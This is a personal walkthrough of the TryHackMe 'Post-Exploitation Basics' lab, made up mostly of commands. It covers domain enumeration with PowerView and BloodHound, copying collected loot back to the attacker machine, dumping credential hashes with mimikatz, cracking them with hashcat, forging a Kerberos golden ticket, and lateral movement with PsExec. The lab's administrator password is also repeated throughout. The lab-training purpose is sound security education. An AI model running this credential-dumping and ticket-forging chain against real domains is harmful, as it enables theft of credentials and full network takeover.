Post-Exploitation Basics
Room Link: https://tryhackme.com/room/postexploit
Presteps for Lab
SharpHound Installation
SharpHound version on the box is too old for the current version of Bloodhound so I had to update it.
Kali
git clone https://github.com/BloodHoundAD/BloodHound.git
scp -r BloodHound/Collectors/SharpHound.ps1 Administrator@$VICTIM:C:/Users/Administrator/
Password: P@$$W0rd
Added this line to SharpHound.ps1 before transfering so I could run the command right away

Victim
powershell -ep bypass
.\SharpHound.ps1
BloodHound Installation
apt-get install bloodhound
neo4j console

Enumeration w/ Powerview
Kali
ssh Administrator@$VICTIM
Password: P@$$W0rd
Victim
Run below to be able to run PowerView commands.
powershell -ep bypass
. .\Downloads\PowerView.ps1
Enumerate the domain users.
Get-NetUser | select cn

Enumerate the domain groups.
Get-NetGroup -GroupName *admin*

Find Shared folders.
Invoke-ShareFinder

Get Operating systems on the network.
Get-NetComputer -fulldata | select operatingsystem

Enumeration w/ Bloodhound
Setup and get loot with Bloodhound.
Victim
powershell -ep bypass
. .\Downloads\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
Transfer Bloodhound results back to Kali. SCP can be used in this case
Kali
scp Administrator@$VICTIM:C:/Users/Administrator/20230212071833_loot.zip loot.zip
Password: P@$$W0rd
Mapping the network w/ BloodHound
bloodhound --no-sandbox
We can just drag the zip file to bloodhound to import it.

Find all Domain Admins


List all Kerberostable accounts


Dumping hashes w/ mimikatz
Kali
ssh Administrator@$VICTIM
Password: P@$$W0rd
Victim
cd Downloads && mimikatz.exe
Victim - Mimikatz
privilege::debug
lsadump::lsa /patch

Copy to Kali output back to Kali
Output only the hashes and remove all duplicates into a new file.
Kali
cat hashes.txt | grep NTLM | awk -F ":" '{print $2}' | grep "\S" | sed 's/^[ \t]*//' | sort | uniq > hash.txt

Kali
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show

Golden Ticket Attacks w/ mimikatz
Kali
ssh Administrator@$VICTIM
Password: P@$$W0rd
Dump the krbtgt Hash
Victim
cd downloads && mimikatz.exe
This dumps the hash and security identifier of the Kerberos Ticket Granting Ticket account allowing you to create a golden ticket. Take note of what is outlined in red you'll need it to create the golden ticket.
Victim - Mimikatz
privilege::debug
lsadump::lsa /inject /name:krbtgt

Create a Golden Ticket
Victim - Mimikatz
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

Use the Golden Ticket to access other machine
This will open a new command prompt with elevated privileges to all machines.Access other Machines! - You will now have another command prompt with access to all other machines on the network.
Victim - Mimikatz
misc::cmd
This doesn't actually work. Because of how tryhackme is setup but you would then be able to access other machines. In the example below you'd need to find out what other machines exists to pull this off.
Victim
dir \\Desktop-1\c$
PsExec.exe \\Desktop-1 cmd.exe

Enumeration w/ Server Manager
Kali
rdesktop -d CONTROLLER -u Administrator $VICTIM
Password: P@$$W0rd
Open Active Directory


Last updated